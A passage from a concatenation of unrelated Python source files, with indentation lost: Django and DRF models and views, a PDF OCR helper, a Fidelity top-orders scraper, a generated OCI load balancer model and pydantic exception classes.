dict((name, [BuildStatus.fromdata(b)
for b in builds])
for name,builds in data['builders']),
sc)
def todata(self):
return { 'version' : 0,
'master_url' : self.master_url,
'builders' : [(name, [b.todata()
for b in builds])
for name,builds in self.builders.items()],
'statusclient' : self.statusclient.todata() }
def __init__(self, master_url, builders, statusclient = None):
self.master_url = master_url
self.builders = builders
if statusclient is None and master_url:
statusclient = buildbot.statusclient.StatusClient(master_url)
self.statusclient = statusclient
# Transient data.
self.event_log = []
self.build_map = dict((name, dict((b.number, b)
for b in builds))
for name,builds in self.builders.items())
def start_monitor(self, app):
if self.statusclient:
self.statusclient.logger = app.logger
monitor = StatusMonitor(app, self)
monitor.start()
return monitor
|
from rest_framework import viewsets, mixins
from ..models import SparePartType
from ..serializers import sparepart_types
class SparePartTypeViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
serializer_class = sparepart_types.SparePartTypeSerializer
queryset = SparePartType.objects.all()
ordering_fields = '__all__'
ordering = ['created']
filterset_fields = ['created', 'modified', ]
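# Illustrative URL wiring for this viewset (router variable and prefix are placeholders):
#     from rest_framework.routers import DefaultRouter
#     router = DefaultRouter()
#     router.register(r'sparepart-types', SparePartTypeViewSet, basename='sparepart-type')
#     urlpatterns = router.urls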
|
# suppress warnings
import warnings
warnings.filterwarnings('ignore')
# common imports
import pandas as pd
import numpy as np
import math
import re
import glob
import os
import json
import random
import pprint as pp
import textwrap
import sqlite3
import logging
import spacy
import nltk
from tqdm.auto import tqdm
# register `pandas.progress_apply` and `pandas.Series.map_apply` with `tqdm`
tqdm.pandas()
# pandas display options
# https://pandas.pydata.org/pandas-docs/stable/user_guide/options.html#available-options
pd.options.display.max_columns = 30 # default 20
pd.options.display.max_rows = 60 # default 60
pd.options.display.float_format = '{:.2f}'.format
# pd.options.display.precision = 2
pd.options.display.max_colwidth = 200 # default 50; -1 = all
# otherwise text between $ signs will be interpreted as formula and printed in italic
pd.set_option('display.html.use_mathjax', False)
# np.set_printoptions(edgeitems=3) # default 3
import matplotlib as mpl
from matplotlib import pyplot as plt
plot_params = {'figure.figsize': (8, 4),
'axes.labelsize': 'large',
'axes.titlesize': 'large',
'xtick.labelsize': 'large',
'ytick.labelsize':'large',
'figure.dpi': 200 }
# adjust matplotlib defaults
mpl.rcParams.update(plot_params)
import seaborn as sns
sns.set_style("darkgrid")
|
# Generated by Django 2.1.4 on 2018-12-08 01:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('finance', '0014_auto_20181208_0124'),
]
operations = [
migrations.AlterField(
model_name='expense',
name='type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='finance.ExpenseType'),
),
]
|
import utils.constants
import logging, pytesseract, fitz
import pandas as pd
from pathlib import Path
from PIL import Image
def convert_pages_into_image(input_path, format):
"""Recursively finds all PDF files within a given directory and converts each
page of each PDF to an image using PyMuPDF."""
# To get better resolution
zoom_x = 2.0
zoom_y = 2.0
zoom_matrix = fitz.Matrix(zoom_x, zoom_y)
pdf_file_list = Path(input_path).rglob("*.pdf")
for pdf_file in pdf_file_list:
logging.debug(f"Converting '{pdf_file.resolve()}'.")
doc = fitz.open(pdf_file)
image_name = pdf_file.stem + "_page_"
images_path = utils.constants.converted_dir / "pages-converted-to-images" / pdf_file.stem
Path(images_path).mkdir(parents=True, exist_ok=True)
for page in doc:
logging.debug(f"Image created at '{images_path}/{image_name}{page.number}{format}'.")
pix = page.get_pixmap(matrix=zoom_matrix)
pix.save(f"{images_path}/{image_name}{page.number}{format}")
def ocr_images_for_text_confidence(input_path, format=".png"):
"""Recursively finds all images of the given format and performs OCR on them
    to create a text file containing the information that was found."""
input_path = Path(input_path).resolve()
for directory in input_path.iterdir():
if directory.name == "pages-converted-to-images":
for sub_dir in directory.iterdir():
images_file_list = sorted(Path(sub_dir).rglob(f"*{format}"))
for item in images_file_list:
split_name = item.name.split("_page_")
txt_file_path = Path(f"{utils.constants.confidence_dir}/{sub_dir.name}/{split_name[0]}-IMAGE-OCR.txt").resolve()
txt_file_path.parent.mkdir(parents=True, exist_ok=True)
logging.debug(f"Performing OCR on '{item.resolve()}'.")
logging.debug(f"Creating text output file at '{txt_file_path}'.")
ocr_string = pytesseract.image_to_string(Image.open(item))
with open(txt_file_path, "a") as stream:
stream.write(ocr_string)
def extract_text_from_pdf_confidence(input_path):
"""Extracts all text from all found PDF files using PyMuPDF for the
confidence check"""
input_path = Path(input_path).resolve()
pdf_file_list = sorted(Path(input_path).rglob(f"*.pdf"))
for pdf in pdf_file_list:
txt_file_path = Path(f"{utils.constants.confidence_dir}/{pdf.stem}/{pdf.stem}-PYMUPDF-TXT.txt").resolve()
txt_file_path.parent.mkdir(parents=True, exist_ok=True)
logging.debug(f"Extracting text from '{pdf.resolve()}'.")
logging.debug(f"Creating text output file at '{txt_file_path}'.")
with fitz.open(pdf) as doc:
pdf_text = ""
for page in doc:
pdf_text += page.get_text()
with open(txt_file_path, "a") as stream:
stream.write(pdf_text)
def extract_images_from_pdf(input_path):
"""Extracts all images from all found PDF files using PyMuPDF."""
input_path = Path(input_path).resolve()
pdf_file_list = sorted(Path(input_path).rglob(f"*.pdf"))
for pdf in pdf_file_list:
doc = fitz.open(pdf)
image_dir = Path(f"{utils.constants.extracted_dir}/{pdf.stem}/extracted-images").resolve()
image_dir.mkdir(parents=True, exist_ok=True)
for page in range(len(doc)):
for img in doc.get_page_images(page):
xref = img[0]
pix = fitz.Pixmap(doc, xref)
if pix.n - pix.alpha < 4:
# this is GRAY or RGB
pix.save(f"{image_dir}/p{page}-{xref}.png")
else:
# CMYK: convert to RGB first
pix1 = fitz.Pixmap(fitz.csRGB, pix)
pix1.save(f"{image_dir}/p{page}-{xref}.png")
pix1 = None
pix = None
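# Typical pipeline (illustrative; assumes the directories in utils.constants exist
# and that "input/" points at a folder containing PDFs):
#     convert_pages_into_image("input/", ".png")
#     ocr_images_for_text_confidence(utils.constants.converted_dir)
#     extract_text_from_pdf_confidence("input/")
#     extract_images_from_pdf("input/")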
|
import argparse
import re
import requests
from colorama import Fore, Style
from bs4 import BeautifulSoup
import pandas as pd
from gamestonk_terminal.helper_funcs import (
check_positive,
get_user_agent,
patch_pandas_text_adjustment,
parse_known_args_and_warn,
)
from gamestonk_terminal.config_terminal import USE_COLOR
def buy_sell_ratio_color_red_green(val: str) -> str:
buy_sell_match = re.match(r"(\d+)% Buys, (\d+)% Sells", val, re.M | re.I)
if not buy_sell_match:
return val
buys = int(buy_sell_match.group(1))
sells = int(buy_sell_match.group(2))
if buys >= sells:
return "{}{}%{} Buys, {}% Sells".format(
Fore.GREEN, buys, Style.RESET_ALL, sells
)
return f"{buys}% Buys, {Fore.RED}{sells}%{Style.RESET_ALL} Sells"
def price_change_color_red_green(val: str) -> str:
val_float = float(val.split(" ")[0])
if val_float > 0:
color = Fore.GREEN
else:
color = Fore.RED
return color + val + Style.RESET_ALL
def orders(l_args):
parser = argparse.ArgumentParser(
add_help=False,
prog="orders",
description="""
Orders by Fidelity customers. Information shown in the table below
is based on the volume of orders entered on the "as of" date shown. Securities
identified are not recommended or endorsed by Fidelity and are displayed for
informational purposes only. [Source: Fidelity]
""",
)
parser.add_argument(
"-n",
"--num",
action="store",
dest="n_num",
type=check_positive,
default=10,
help="Number of top ordered stocks to be printed.",
)
ns_parser = parse_known_args_and_warn(parser, l_args)
if not ns_parser:
return
url_orders = (
"https://eresearch.fidelity.com/eresearch/gotoBL/fidelityTopOrders.jhtml"
)
text_soup_url_orders = BeautifulSoup(
requests.get(url_orders, headers={"User-Agent": get_user_agent()}).text, "lxml"
)
l_orders = list()
l_orders_vals = list()
idx = 0
order_list = text_soup_url_orders.findAll(
"td",
{"class": ["second", "third", "fourth", "fifth", "sixth", "seventh", "eight"]},
)
for an_order in order_list:
if ((idx + 1) % 3 == 0) or ((idx + 1) % 4 == 0) or ((idx + 1) % 6 == 0):
if not an_order:
l_orders_vals.append("")
else:
l_orders_vals.append(an_order.contents[1])
elif (idx + 1) % 5 == 0:
s_orders = str(an_order)
l_orders_vals.append(
s_orders[
s_orders.find('title="') + len('title="') : s_orders.find('"/>')
]
)
else:
l_orders_vals.append(an_order.text.strip())
idx += 1
# Add value to dictionary
if (idx + 1) % 8 == 0:
l_orders.append(l_orders_vals)
l_orders_vals = list()
idx = 0
df_orders = pd.DataFrame(
l_orders,
columns=[
"Symbol",
"Company",
"Price Change",
"# Buy Orders",
"Buy / Sell Ratio",
"# Sell Orders",
"Latest News",
],
)
df_orders = df_orders[
[
"Symbol",
"Buy / Sell Ratio",
"Price Change",
"Company",
"# Buy Orders",
"# Sell Orders",
"Latest News",
]
]
print(
text_soup_url_orders.findAll("span", {"class": "source"})[0].text.capitalize()
+ ":"
)
pd.set_option("display.max_colwidth", None)
if USE_COLOR:
df_orders["Buy / Sell Ratio"] = df_orders["Buy / Sell Ratio"].apply(
buy_sell_ratio_color_red_green
)
df_orders["Price Change"] = df_orders["Price Change"].apply(
price_change_color_red_green
)
patch_pandas_text_adjustment()
print(df_orders.head(n=ns_parser.n_num).iloc[:, :-1].to_string(index=False))
print("")
|
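# Reads n pairs "w h", keeps the maximum h seen for each distinct w,
# and prints the sum of those maxima.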
n = int(input())
s = {}
for i in range(n):
w, h = [int(x) for x in input().split()]
    if w not in s or h > s[w]:
s[w] = h
print(sum(s.values()))
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateLoadBalancerDetails(object):
"""
The configuration details for creating a load balancer.
**Warning:** Oracle recommends that you avoid using any confidential information when you supply string values using the API.
"""
#: A constant which can be used with the ip_mode property of a CreateLoadBalancerDetails.
#: This constant has a value of "IPV4"
IP_MODE_IPV4 = "IPV4"
#: A constant which can be used with the ip_mode property of a CreateLoadBalancerDetails.
#: This constant has a value of "IPV6"
IP_MODE_IPV6 = "IPV6"
def __init__(self, **kwargs):
"""
Initializes a new CreateLoadBalancerDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this CreateLoadBalancerDetails.
:type compartment_id: str
:param display_name:
The value to assign to the display_name property of this CreateLoadBalancerDetails.
:type display_name: str
:param shape_name:
The value to assign to the shape_name property of this CreateLoadBalancerDetails.
:type shape_name: str
:param shape_details:
The value to assign to the shape_details property of this CreateLoadBalancerDetails.
:type shape_details: oci.load_balancer.models.ShapeDetails
:param is_private:
The value to assign to the is_private property of this CreateLoadBalancerDetails.
:type is_private: bool
:param ip_mode:
The value to assign to the ip_mode property of this CreateLoadBalancerDetails.
Allowed values for this property are: "IPV4", "IPV6"
:type ip_mode: str
:param reserved_ips:
The value to assign to the reserved_ips property of this CreateLoadBalancerDetails.
:type reserved_ips: list[oci.load_balancer.models.ReservedIP]
:param listeners:
The value to assign to the listeners property of this CreateLoadBalancerDetails.
:type listeners: dict(str, ListenerDetails)
:param hostnames:
The value to assign to the hostnames property of this CreateLoadBalancerDetails.
:type hostnames: dict(str, HostnameDetails)
:param backend_sets:
The value to assign to the backend_sets property of this CreateLoadBalancerDetails.
:type backend_sets: dict(str, BackendSetDetails)
:param network_security_group_ids:
The value to assign to the network_security_group_ids property of this CreateLoadBalancerDetails.
:type network_security_group_ids: list[str]
:param subnet_ids:
The value to assign to the subnet_ids property of this CreateLoadBalancerDetails.
:type subnet_ids: list[str]
:param certificates:
The value to assign to the certificates property of this CreateLoadBalancerDetails.
:type certificates: dict(str, CertificateDetails)
:param ssl_cipher_suites:
The value to assign to the ssl_cipher_suites property of this CreateLoadBalancerDetails.
:type ssl_cipher_suites: dict(str, SSLCipherSuiteDetails)
:param path_route_sets:
The value to assign to the path_route_sets property of this CreateLoadBalancerDetails.
:type path_route_sets: dict(str, PathRouteSetDetails)
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateLoadBalancerDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this CreateLoadBalancerDetails.
:type defined_tags: dict(str, dict(str, object))
:param rule_sets:
The value to assign to the rule_sets property of this CreateLoadBalancerDetails.
:type rule_sets: dict(str, RuleSetDetails)
"""
self.swagger_types = {
'compartment_id': 'str',
'display_name': 'str',
'shape_name': 'str',
'shape_details': 'ShapeDetails',
'is_private': 'bool',
'ip_mode': 'str',
'reserved_ips': 'list[ReservedIP]',
'listeners': 'dict(str, ListenerDetails)',
'hostnames': 'dict(str, HostnameDetails)',
'backend_sets': 'dict(str, BackendSetDetails)',
'network_security_group_ids': 'list[str]',
'subnet_ids': 'list[str]',
'certificates': 'dict(str, CertificateDetails)',
'ssl_cipher_suites': 'dict(str, SSLCipherSuiteDetails)',
'path_route_sets': 'dict(str, PathRouteSetDetails)',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'rule_sets': 'dict(str, RuleSetDetails)'
}
self.attribute_map = {
'compartment_id': 'compartmentId',
'display_name': 'displayName',
'shape_name': 'shapeName',
'shape_details': 'shapeDetails',
'is_private': 'isPrivate',
'ip_mode': 'ipMode',
'reserved_ips': 'reservedIps',
'listeners': 'listeners',
'hostnames': 'hostnames',
'backend_sets': 'backendSets',
'network_security_group_ids': 'networkSecurityGroupIds',
'subnet_ids': 'subnetIds',
'certificates': 'certificates',
'ssl_cipher_suites': 'sslCipherSuites',
'path_route_sets': 'pathRouteSets',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'rule_sets': 'ruleSets'
}
self._compartment_id = None
self._display_name = None
self._shape_name = None
self._shape_details = None
self._is_private = None
self._ip_mode = None
self._reserved_ips = None
self._listeners = None
self._hostnames = None
self._backend_sets = None
self._network_security_group_ids = None
self._subnet_ids = None
self._certificates = None
self._ssl_cipher_suites = None
self._path_route_sets = None
self._freeform_tags = None
self._defined_tags = None
self._rule_sets = None
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this CreateLoadBalancerDetails.
The `OCID`__ of the compartment in which to create the load balancer.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this CreateLoadBalancerDetails.
The `OCID`__ of the compartment in which to create the load balancer.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this CreateLoadBalancerDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def display_name(self):
"""
**[Required]** Gets the display_name of this CreateLoadBalancerDetails.
A user-friendly name. It does not have to be unique, and it is changeable.
Avoid entering confidential information.
Example: `example_load_balancer`
:return: The display_name of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this CreateLoadBalancerDetails.
A user-friendly name. It does not have to be unique, and it is changeable.
Avoid entering confidential information.
Example: `example_load_balancer`
:param display_name: The display_name of this CreateLoadBalancerDetails.
:type: str
"""
self._display_name = display_name
@property
def shape_name(self):
"""
**[Required]** Gets the shape_name of this CreateLoadBalancerDetails.
A template that determines the total pre-provisioned bandwidth (ingress plus egress).
To get a list of available shapes, use the :func:`list_shapes`
operation.
Example: `100Mbps`
:return: The shape_name of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._shape_name
@shape_name.setter
def shape_name(self, shape_name):
"""
Sets the shape_name of this CreateLoadBalancerDetails.
A template that determines the total pre-provisioned bandwidth (ingress plus egress).
To get a list of available shapes, use the :func:`list_shapes`
operation.
Example: `100Mbps`
:param shape_name: The shape_name of this CreateLoadBalancerDetails.
:type: str
"""
self._shape_name = shape_name
@property
def shape_details(self):
"""
Gets the shape_details of this CreateLoadBalancerDetails.
The configuration details to create load balancer using Flexible shape. This is required only if shapeName is `Flexible`.
:return: The shape_details of this CreateLoadBalancerDetails.
:rtype: oci.load_balancer.models.ShapeDetails
"""
return self._shape_details
@shape_details.setter
def shape_details(self, shape_details):
"""
Sets the shape_details of this CreateLoadBalancerDetails.
The configuration details to create load balancer using Flexible shape. This is required only if shapeName is `Flexible`.
:param shape_details: The shape_details of this CreateLoadBalancerDetails.
:type: oci.load_balancer.models.ShapeDetails
"""
self._shape_details = shape_details
@property
def is_private(self):
"""
Gets the is_private of this CreateLoadBalancerDetails.
Whether the load balancer has a VCN-local (private) IP address.
If \"true\", the service assigns a private IP address to the load balancer.
If \"false\", the service assigns a public IP address to the load balancer.
A public load balancer is accessible from the internet, depending on your VCN's
`security list rules`__. For more information about public and
private load balancers, see `How Load Balancing Works`__.
Example: `true`
__ https://docs.cloud.oracle.com/Content/Network/Concepts/securitylists.htm
__ https://docs.cloud.oracle.com/Content/Balance/Concepts/balanceoverview.htm#how-load-balancing-works
:return: The is_private of this CreateLoadBalancerDetails.
:rtype: bool
"""
return self._is_private
@is_private.setter
def is_private(self, is_private):
"""
Sets the is_private of this CreateLoadBalancerDetails.
Whether the load balancer has a VCN-local (private) IP address.
If \"true\", the service assigns a private IP address to the load balancer.
If \"false\", the service assigns a public IP address to the load balancer.
A public load balancer is accessible from the internet, depending on your VCN's
`security list rules`__. For more information about public and
private load balancers, see `How Load Balancing Works`__.
Example: `true`
__ https://docs.cloud.oracle.com/Content/Network/Concepts/securitylists.htm
__ https://docs.cloud.oracle.com/Content/Balance/Concepts/balanceoverview.htm#how-load-balancing-works
:param is_private: The is_private of this CreateLoadBalancerDetails.
:type: bool
"""
self._is_private = is_private
@property
def ip_mode(self):
"""
Gets the ip_mode of this CreateLoadBalancerDetails.
Whether the load balancer has an IPv4 or IPv6 IP address.
If \"IPV4\", the service assigns an IPv4 address and the load balancer supports IPv4 traffic.
If \"IPV6\", the service assigns an IPv6 address and the load balancer supports IPv6 traffic.
Example: \"ipMode\":\"IPV6\"
Allowed values for this property are: "IPV4", "IPV6"
:return: The ip_mode of this CreateLoadBalancerDetails.
:rtype: str
"""
return self._ip_mode
@ip_mode.setter
def ip_mode(self, ip_mode):
"""
Sets the ip_mode of this CreateLoadBalancerDetails.
Whether the load balancer has an IPv4 or IPv6 IP address.
If \"IPV4\", the service assigns an IPv4 address and the load balancer supports IPv4 traffic.
If \"IPV6\", the service assigns an IPv6 address and the load balancer supports IPv6 traffic.
Example: \"ipMode\":\"IPV6\"
:param ip_mode: The ip_mode of this CreateLoadBalancerDetails.
:type: str
"""
allowed_values = ["IPV4", "IPV6"]
if not value_allowed_none_or_none_sentinel(ip_mode, allowed_values):
raise ValueError(
"Invalid value for `ip_mode`, must be None or one of {0}"
.format(allowed_values)
)
self._ip_mode = ip_mode
@property
def reserved_ips(self):
"""
Gets the reserved_ips of this CreateLoadBalancerDetails.
An array of reserved Ips.
:return: The reserved_ips of this CreateLoadBalancerDetails.
:rtype: list[oci.load_balancer.models.ReservedIP]
"""
return self._reserved_ips
@reserved_ips.setter
def reserved_ips(self, reserved_ips):
"""
Sets the reserved_ips of this CreateLoadBalancerDetails.
An array of reserved Ips.
:param reserved_ips: The reserved_ips of this CreateLoadBalancerDetails.
:type: list[oci.load_balancer.models.ReservedIP]
"""
self._reserved_ips = reserved_ips
@property
def listeners(self):
"""
Gets the listeners of this CreateLoadBalancerDetails.
:return: The listeners of this CreateLoadBalancerDetails.
:rtype: dict(str, ListenerDetails)
"""
return self._listeners
@listeners.setter
def listeners(self, listeners):
"""
Sets the listeners of this CreateLoadBalancerDetails.
:param listeners: The listeners of this CreateLoadBalancerDetails.
:type: dict(str, ListenerDetails)
"""
self._listeners = listeners
@property
def hostnames(self):
"""
Gets the hostnames of this CreateLoadBalancerDetails.
:return: The hostnames of this CreateLoadBalancerDetails.
:rtype: dict(str, HostnameDetails)
"""
return self._hostnames
@hostnames.setter
def hostnames(self, hostnames):
"""
Sets the hostnames of this CreateLoadBalancerDetails.
:param hostnames: The hostnames of this CreateLoadBalancerDetails.
:type: dict(str, HostnameDetails)
"""
self._hostnames = hostnames
@property
def backend_sets(self):
"""
Gets the backend_sets of this CreateLoadBalancerDetails.
:return: The backend_sets of this CreateLoadBalancerDetails.
:rtype: dict(str, BackendSetDetails)
"""
return self._backend_sets
@backend_sets.setter
def backend_sets(self, backend_sets):
"""
Sets the backend_sets of this CreateLoadBalancerDetails.
:param backend_sets: The backend_sets of this CreateLoadBalancerDetails.
:type: dict(str, BackendSetDetails)
"""
self._backend_sets = backend_sets
@property
def network_security_group_ids(self):
"""
Gets the network_security_group_ids of this CreateLoadBalancerDetails.
An array of NSG `OCIDs`__ associated with this load balancer.
During the load balancer's creation, the service adds the new load balancer to the specified NSGs.
The benefits of using NSGs with the load balancer include:
* NSGs define network security rules to govern ingress and egress traffic for the load balancer.
* The network security rules of other resources can reference the NSGs associated with the load balancer
to ensure access.
Example: `[\"ocid1.nsg.oc1.phx.unique_ID\"]`
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The network_security_group_ids of this CreateLoadBalancerDetails.
:rtype: list[str]
"""
return self._network_security_group_ids
@network_security_group_ids.setter
def network_security_group_ids(self, network_security_group_ids):
"""
Sets the network_security_group_ids of this CreateLoadBalancerDetails.
An array of NSG `OCIDs`__ associated with this load balancer.
During the load balancer's creation, the service adds the new load balancer to the specified NSGs.
The benefits of using NSGs with the load balancer include:
* NSGs define network security rules to govern ingress and egress traffic for the load balancer.
* The network security rules of other resources can reference the NSGs associated with the load balancer
to ensure access.
Example: `[\"ocid1.nsg.oc1.phx.unique_ID\"]`
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param network_security_group_ids: The network_security_group_ids of this CreateLoadBalancerDetails.
:type: list[str]
"""
self._network_security_group_ids = network_security_group_ids
@property
def subnet_ids(self):
"""
**[Required]** Gets the subnet_ids of this CreateLoadBalancerDetails.
An array of subnet `OCIDs`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The subnet_ids of this CreateLoadBalancerDetails.
:rtype: list[str]
"""
return self._subnet_ids
@subnet_ids.setter
def subnet_ids(self, subnet_ids):
"""
Sets the subnet_ids of this CreateLoadBalancerDetails.
An array of subnet `OCIDs`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param subnet_ids: The subnet_ids of this CreateLoadBalancerDetails.
:type: list[str]
"""
self._subnet_ids = subnet_ids
@property
def certificates(self):
"""
Gets the certificates of this CreateLoadBalancerDetails.
:return: The certificates of this CreateLoadBalancerDetails.
:rtype: dict(str, CertificateDetails)
"""
return self._certificates
@certificates.setter
def certificates(self, certificates):
"""
Sets the certificates of this CreateLoadBalancerDetails.
:param certificates: The certificates of this CreateLoadBalancerDetails.
:type: dict(str, CertificateDetails)
"""
self._certificates = certificates
@property
def ssl_cipher_suites(self):
"""
Gets the ssl_cipher_suites of this CreateLoadBalancerDetails.
:return: The ssl_cipher_suites of this CreateLoadBalancerDetails.
:rtype: dict(str, SSLCipherSuiteDetails)
"""
return self._ssl_cipher_suites
@ssl_cipher_suites.setter
def ssl_cipher_suites(self, ssl_cipher_suites):
"""
Sets the ssl_cipher_suites of this CreateLoadBalancerDetails.
:param ssl_cipher_suites: The ssl_cipher_suites of this CreateLoadBalancerDetails.
:type: dict(str, SSLCipherSuiteDetails)
"""
self._ssl_cipher_suites = ssl_cipher_suites
@property
def path_route_sets(self):
"""
Gets the path_route_sets of this CreateLoadBalancerDetails.
:return: The path_route_sets of this CreateLoadBalancerDetails.
:rtype: dict(str, PathRouteSetDetails)
"""
return self._path_route_sets
@path_route_sets.setter
def path_route_sets(self, path_route_sets):
"""
Sets the path_route_sets of this CreateLoadBalancerDetails.
:param path_route_sets: The path_route_sets of this CreateLoadBalancerDetails.
:type: dict(str, PathRouteSetDetails)
"""
self._path_route_sets = path_route_sets
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateLoadBalancerDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this CreateLoadBalancerDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateLoadBalancerDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this CreateLoadBalancerDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateLoadBalancerDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this CreateLoadBalancerDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateLoadBalancerDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this CreateLoadBalancerDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def rule_sets(self):
"""
Gets the rule_sets of this CreateLoadBalancerDetails.
:return: The rule_sets of this CreateLoadBalancerDetails.
:rtype: dict(str, RuleSetDetails)
"""
return self._rule_sets
@rule_sets.setter
def rule_sets(self, rule_sets):
"""
Sets the rule_sets of this CreateLoadBalancerDetails.
:param rule_sets: The rule_sets of this CreateLoadBalancerDetails.
:type: dict(str, RuleSetDetails)
"""
self._rule_sets = rule_sets
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
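# Illustrative usage sketch of the property setters above. It assumes the
# generated __init__(self, **kwargs) signature that oci SDK model classes share;
# the OCIDs are placeholders taken from the docstring examples.
def _create_load_balancer_details_sketch():
    details = CreateLoadBalancerDetails()
    details.subnet_ids = ["ocid1.subnet.oc1.phx.unique_ID"]
    details.network_security_group_ids = ["ocid1.nsg.oc1.phx.unique_ID"]
    details.ip_mode = "IPV6"  # allowed values: "IPV4", "IPV6"
    details.freeform_tags = {"Department": "Finance"}
    try:
        details.ip_mode = "DUALSTACK"  # not an allowed value
    except ValueError:
        pass  # the ip_mode setter rejects anything outside allowed_values
    return details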
|
from django.db import models
from django.core.mail import EmailMessage
# Represents an email that has been queued in the database but not yet sent
class Email(models.Model):
SUBJECT_MAX_LEN = 255
datetime = models.DateTimeField(auto_now_add=True, verbose_name='date')
subject = models.CharField(max_length=SUBJECT_MAX_LEN, verbose_name='sujet',)
from_email = models.EmailField(verbose_name='adresse mail source',)
body = models.TextField(verbose_name='contenu')
    def to_message(self):
        # Build a django.core.mail.EmailMessage from the stored subject, body and
        # sender, plus the related recipient addresses ("to") and attachments.
msg = EmailMessage(
self.subject,
self.body,
self.from_email,
[str(dest) for dest in self.to.all()],
[],
)
for attachment in self.attachments.all():
msg.attach(*attachment.to_tuple())
return msg
# A single recipient address for a queued Email (exposed as Email.to)
class DestAddr(models.Model):
email = models.ForeignKey(Email, related_name='to', on_delete=models.CASCADE)
addr = models.EmailField(verbose_name='adresse mail',)
def __str__(self):
return self.addr
# A file attachment for a queued Email; to_tuple() mirrors EmailMessage.attach(filename, content, mimetype)
class Attachment(models.Model):
FILENAME_MAX_LEN = 255
MIMETYPE_MAX_LEN = 255
email = models.ForeignKey(Email, related_name='attachments', on_delete=models.CASCADE)
filename = models.CharField(max_length=FILENAME_MAX_LEN, verbose_name='nom',)
mimetype = models.CharField(max_length=MIMETYPE_MAX_LEN, verbose_name='mimetype',)
content = models.TextField(verbose_name='contenu',)
def to_tuple(self):
return self.filename, self.content, self.mimetype
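# Illustrative sketch of queueing and sending an email with the models above.
# Assumes migrations for these models exist and a Django EMAIL_BACKEND is
# configured; the addresses and file contents are placeholders.
def _queue_and_send_email_sketch():
    email = Email.objects.create(
        subject='Weekly report',
        from_email='noreply@example.org',
        body='See attached file.',
    )
    DestAddr.objects.create(email=email, addr='alice@example.org')
    Attachment.objects.create(
        email=email,
        filename='report.txt',
        mimetype='text/plain',
        content='hello',
    )
    # to_message() collects the related DestAddr rows ("to") and Attachment rows
    # ("attachments") and returns a sendable EmailMessage.
    email.to_message().send()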
|
# generated by datamodel-codegen:
# filename: openapi.yaml
# timestamp: 2021-12-31T02:46:26+00:00
from __future__ import annotations
from datetime import datetime
from enum import Enum
from typing import Annotated, Any, List, Optional
from pydantic import BaseModel, Extra, Field
class ApprovalRuleTemplateNameRequiredException(BaseModel):
__root__: Any
class InvalidApprovalRuleTemplateNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ApprovalRuleTemplateDoesNotExistException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumRuleTemplatesAssociatedWithRepositoryException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
